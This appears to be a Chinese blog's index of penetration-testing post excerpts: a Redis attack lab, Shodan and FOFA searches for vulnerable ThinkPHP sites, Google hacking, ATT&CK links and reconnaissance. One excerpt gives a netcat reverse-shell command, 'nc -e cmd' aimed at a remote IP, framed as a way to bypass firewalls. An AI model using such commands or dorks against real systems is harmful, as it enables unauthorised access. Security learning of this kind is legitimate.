shenkong

摘要： 环境： 攻击机：Kali 5.16.0-kali7-amd64 192.168.13.78 靶机： Kali 5.16.0-kali7-amd64 192.168.13.94 安装redis: wget http://download.redis.io/redis-stable.tar.gztar 阅读全文

摘要： 本文转载自：https://www.cnblogs.com/miaodaren/p/9177379.html 在Shodan搜索中有一个关于网站icon图标的搜索语法，http.favicon.hash，我们可以使用这个语法来搜索出使用了同一icon图标的网站，不知道怎么用的朋友请参考我上一篇文章。 阅读全文

摘要： 1> 进入kali系统，修改ssh配置文件：vi /etc/ssh/sshd_config 2> 将PermitRootLogin without-password修改为：PermitRootLogin yes 快速查找： :set number /PermitRootLogin 3> 找到#Pas 阅读全文

摘要： 转载自：https://www.cnblogs.com/sunny11/p/14388508.html `目录题记技巧（我一般找国内的，所以下边一直加cn）1、搜索HTTP响应头中含有"thinkphp"关键词的网站和IP。2、加上标题带有后台的。3、加上时间，现在新网站有thinkphp日志泄露的 阅读全文

摘要： c： 瑞士军刀/网络测评工具 将本地的cmd 权限移交到外网 nc工具：应用 本地cmd打开， 输入 nc -e cmd 远程ip 5577 #连接到远程ip的5577 远程cmd打开， 输入 nc -lvvp 5577 ###(监听本地5577) nc工具反弹shell 绕过防火墙。。。待续.. 阅读全文

摘要： 0x01简介 GoogleHack（谷歌语法）是指使用Google等搜索引擎对某些特定的网络主机漏洞（通常是服务器上的脚本漏洞）进行搜索，以达到快速找到漏洞主机或特定主机的漏洞的目的。比如使用搜索包含指定url：inurl:xxx，搜索包含指定标题：intitle:xxx。使用这种搜索方式通常可以避 阅读全文

摘要： 相关资源列表 https://mitre-attack.github.io/ mitre 科技机构对攻击技术的总结 wiki https://huntingday.github.io MITRE | ATT&CK 中文站[http://www.ddosi.org/att/] https://arxi 阅读全文

摘要： 信息收集 1.1 第一步 域名探测 当我们要对一个站点进行渗透测试之前，一般渗透测试人员常见方法是直接通漏洞扫描器来对指定目标站点进行渗透，当指定的目标站点无漏洞情况，渗透测试员就需要进行信息收集工作来完成后期的渗透。 目前一般域名漏洞扫描工具分为Web与系统扫描器，Web主要有：AWVS、APPS 阅读全文